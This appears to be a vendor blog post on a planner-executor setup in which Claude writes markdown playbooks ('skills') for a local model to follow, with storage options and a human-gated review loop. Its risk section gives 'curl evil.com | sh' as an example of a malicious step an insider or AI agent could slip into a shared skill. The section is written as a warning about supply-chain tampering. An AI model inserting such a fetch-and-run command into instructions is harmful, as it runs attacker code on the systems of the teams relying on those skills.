Claude Teaches Local AI Through Skills — Planner-Executor EP2

In EP1 — Planner-Executor Pattern we covered Claude thinking + Local AI doing. The follow-up question came up immediately: if Local AI has to handle work it has never done before, how do we "teach" it without fine-tuning the model (which burns GPU and takes days)? The answer is Skills — playbooks that Claude writes as SOPs for Local AI to load when it encounters a matching trigger. This article explains how skills for Local AI differ from skills Claude reads itself, three ways to store skills in an enterprise, the skill review loop that prevents skill drift, and how to roll this out across a real team.

Quick summary — skills in the Planner-Executor context

✓ It is: a markdown playbook + tool list + trigger condition that Local AI loads when it sees matching work — Claude writes and maintains them.

✗ It isn't: not fine-tuning, not vector-DB embeddings, not a fixed system prompt — a skill loads only when a trigger matches.

Why Skills — The Gap EP1 Doesn't Close

EP1 ends with Claude writing a plan that Local AI executes — which sounds good until Local AI has to do something it has never done before, like "deploy this Angular app to nginx and reload the service." Every time work like that comes in, Claude has to write the plan from scratch, even though it's repetitive work that's 95% identical each time.

That's why skills emerge. The first time: Claude thinks, Local AI does, then Claude summarises into a skill. From the second time on: Claude just says "use the skill called deploy-angular-nginx," Local AI loads it and follows along — Claude's token use drops another 5–10× compared to EP1.

The corporate analogy

Think of a team lead writing an SOP for new hires. The first time they have to walk through every step. After that, they just say "follow SOP-DEPLOY-007" — the new hire opens the doc, follows it, and the lead doesn't have to repeat themselves. Skills work the same way.

What a Skill Actually Is — The Real Structure

A skill used in the Planner-Executor pattern has four parts, written as a single markdown file:

Part	Purpose	Example
1. Frontmatter	Metadata: name, description, trigger keywords	`name: deploy-angular-nginx`
2. Trigger	Conditions under which Local AI loads this skill	"deploy angular", "ng build + reload nginx"
3. Steps	Explicit sequence of steps (no implicit ones)	step 1: cd /app, step 2: npm run build, ...
4. Tools	Tools this skill is allowed to use	bash, write_file, http_post

A typical skill is 200–800 lines of markdown — longer than an ad-hoc plan in EP1, but reusable thousands of times. The economics work out fast.

Claude's Own Skills vs Skills Claude Writes for Local AI

This is where many teams trip up on first contact — they take a skill Claude reads for itself and hand it to Local AI. It doesn't work, because Claude infers implicit context far better than Local AI does.

Dimension	Skill for Claude	Skill for Local AI (e.g. Qwen 32B)
Explicitness	Moderate — Claude infers missing context	Maximum — name the working directory, env vars, commands directly
Typical size	100–300 lines	300–800 lines (3–5× longer)
Error handling	General patterns are enough	List each error case + the matching fix
Decision point	"If this is a production deploy, use flag X"	"If env `STAGE=prod` run step 4a; if `STAGE=staging` run step 4b"
Output format	"return summary"	"return JSON {status, files_changed, log_tail_20_lines}"

The upshot: a Local-AI skill is essentially a script written as markdown — strip out as much ambiguity as possible. That's why Claude has to write the skills, not Local AI — Local AI doesn't know what it can't infer; it's the person who doesn't know what they don't know.

Three Ways to Store Skills

As skills accumulate (you might be at 100–500 within six months), storage matters as much as authoring. Get it wrong and you end up with scattered files nobody can find.

Approach	How it works	Suitable for	Limits
A. Shared folder	Store in `.skills/` inside the repo — Claude and Local AI both read files directly	Small dev teams of 1–5, fewer than 50 skills	Hard to search at scale, no dedicated version control
B. MCP Server	Host skills as tools via Model Context Protocol — both models call through the API	Teams already using MCP that want a unified interface	You now have one more service to maintain
C. Skill Registry (DB-backed)	A database with skills + version + metrics (success rate, last used)	Organisations using skills daily, that want A/B testing and audit	Most complex setup, needs a dedicated team

Always start with A. Teams that jump straight to C burn 2–3 months building infrastructure they'll outgrow because they don't yet know what skills they really need — the same reason you build ERP process-first, schema-second (see also ERP Implementation — How to Begin When Your Org Wants ERP).

Skill Review Loop — Preventing Skill Drift

The problem teams hit after 1–2 months on this pattern is skill drift — new skills Claude generates look fine, but when Local AI follows them the result is wrong, because the skill was never tested against the actual executor.

The fix is a four-stage skill review loop:

Stage	Who	Work	Pass criteria
1. Generate	Claude	Drafts a skill from a task that has repeated several times	Lint passes (frontmatter complete, every step has an action verb)
2. Dry-run	Local AI	Runs the skill against pre-built test fixtures	≥ 90% success rate over 10 runs
3. Verify	Claude	Reads logs from all 10 runs and checks results against spec	No false positives
4. Promote	Human (DevOps)	Approves it into the production registry	Human gate before any real use

Stage 4 is the most important. Never let a skill into production without a human approval, no matter how well the dry-run looks — fixtures never cover every real-world case. Same principle as the audit trail discussion in AI Internal Audit — Auditing AI in Enterprise Work.

⚠️ Risks Specific to a Skill System

1. Skill sprawl

When Claude can write skills easily, teams write a lot of them — and a month in you have 200 skills with 3–4 overlapping ones per task. Local AI doesn't know which to pick. Fix: quota new-skill creation + monthly audit that merges duplicates.

2. Skill hijacking

If the registry is open to editing, an insider (or even an AI agent) could modify a widely-used skill to run something dangerous — slipping curl evil.com | sh into a step nobody scans carefully. Fix: skills go through code review like real code, with diff approval workflow.

3. Stale skills

A skill written six months ago may refer to paths or libraries that have since moved. Local AI follows it and it fails. Fix: track last_success_at per skill — if it hasn't been used in a while and then fails, flag it for Claude to regenerate.

4. Over-fitting to one executor

A skill tested against Qwen 32B may not work on Llama 70B because instruction-following differs per model. Fix: if you plan multi-executor, test every skill against every executor before promotion.

Risk	Mitigation	Owner
Skill sprawl	Creation quota + monthly dedupe audit	Tech Lead
Skill hijacking	Code review + diff approval, sign skills with a key	DevOps + Security
Stale skills	Track last_success_at, auto-flag on failure	Orchestrator
Over-fitting executor	Test against every executor before promotion	QA / Tech Lead

Real Use Cases — Three Skills Most Teams Start With

If you're building a skill registry for the first time, start with these three — the scope is clear, verification is easy, and ROI shows up fast.

A. Skill: generate-migration

Trigger: when there's a schema diff between dev and staging — Local AI generates the migration script (Alembic / Flyway / hand-written SQL) per the skill's steps. Output is a .sql file plus a rollback script.

B. Skill: write-test-from-bug-report

Trigger: when a Linear/Jira bug report includes reproduce steps — Local AI generates a failing test case (red test) from the steps and drops it into the test suite, ready to turn green once the dev fixes the bug.

C. Skill: changelog-from-commits

Trigger: before a release — Local AI reads git log since the last tag, groups by conventional commit type (feat/fix/chore), and writes CHANGELOG.md in the standard format.

All three have immediately verifiable output (run the test, dry-run the migration in a sandbox, read the CHANGELOG), making them ideal for validating that Claude-written skills actually work for your Local AI.

How Saeree ERP Looks at Skills

Developing Saeree ERP means maintaining a lot of modules (accounting, inventory, HR, GFMIS adapter, report engine, etc.) and we hit recurring maintenance work several times a month — "add a new validation rule to form X", "generate a report definition from template Y" — which are strong skill candidates because the pattern is identical every time, only the parameters change.

In the next phase of the AI Assistant Saeree ERP is building, a skill registry is likely to be the key component that lets our on-premise customers "teach" the AI to handle their org-specific customisations — without those skills ever leaving the machine. Same goal as the Planner-Executor pattern in EP1.

Summary — What Skills Add to Planner-Executor

Compared on	EP1 (Planner-Executor as-is)	EP2 (adding Skills)
Repetitive work	Claude writes a fresh plan every time	Claude calls an existing skill — tokens drop 5–10×
New work	Claude thinks, Local AI does	Same, plus if it'll repeat → Claude promotes it to a skill
Executor quality	Depends on each plan	More stable — skills are reviewed
Overhead	None — runs immediately	Maintain a skill registry and a review loop
Right when	Work isn't stable yet, no clear pattern	The same pattern has shown up ≥ 5 times

"Skills are how you let the smart AI write SOPs for the cheap AI — so the cheap AI does the work of the smart AI, on tasks where the pattern is already stable."

A Question to Sit With

Of the work your dev/IT team repeats every week — how many patterns are really "SOPs that were never written down"? If AI helped turn those into runnable skills, how many hours per week would you give back to the team? Count five skill candidates closest at hand — that's the seed of a skill registry in your org.

If you're evaluating an AI architecture that bundles planner + executor + skill registry for use with core internal systems, book a consultation with the Saeree ERP team for help fitting it to your data policy and workflow.

References

Anthropic — Claude Code Skills documentation
Anthropic — Agent Skills announcement
Anthropic — Building Effective Agents — orchestrator-workers pattern
Model Context Protocol — MCP specification (skill-as-tool transport)
Ollama — Qwen2.5-Coder (executor reference model)

Claude Teaches Local AI Through Skills — EP2

Why Skills — The Gap EP1 Doesn't Close

What a Skill Actually Is — The Real Structure

Claude's Own Skills vs Skills Claude Writes for Local AI

Three Ways to Store Skills

Skill Review Loop — Preventing Skill Drift